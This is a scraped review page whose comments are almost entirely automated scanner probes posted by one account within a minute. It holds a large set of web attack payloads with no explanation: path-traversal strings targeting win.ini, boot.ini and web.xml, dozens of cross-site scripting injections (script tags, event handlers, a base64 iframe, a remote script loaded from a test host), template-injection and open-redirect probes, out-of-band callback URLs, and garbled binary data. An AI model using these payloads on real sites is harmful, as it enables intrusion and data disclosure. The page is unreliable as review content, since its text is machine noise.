.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1&n989557=v918105
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.&n942347=v958203
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644/.
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitncSVkFUySu.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644/.
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitA84MrPkHtW.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hit9RoSJczA7d.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
984233
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
644/.
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://hita8ay5aiFq8.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://hitJrvjLJvFvM.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://hitnWJb8ptXeA.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644/.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(960288)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644/.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(937966)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1_923452
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
644/.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
acu7251<s1﹥s2ʺs3ʹuca7251
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
908077
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
acux8160��z1��z2a�bcxuca8160
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
{{9999305*9999367}}
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(976122)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(980321)</script>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(954746)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(969488)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
960443
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923317></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(955887)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(914574)">
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(909847);>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(959200)%3E
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(932859)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(908034))>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='952130'>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(962768)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988447)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(920152)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(990827)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(947537)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
983586
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(949438)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(967616)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(937352) //�>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(926106)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(934395);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(929783))}
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(986316)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1_xPN1i
<ScRiPt >prompt(920583)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=909254.com></IfRamE>
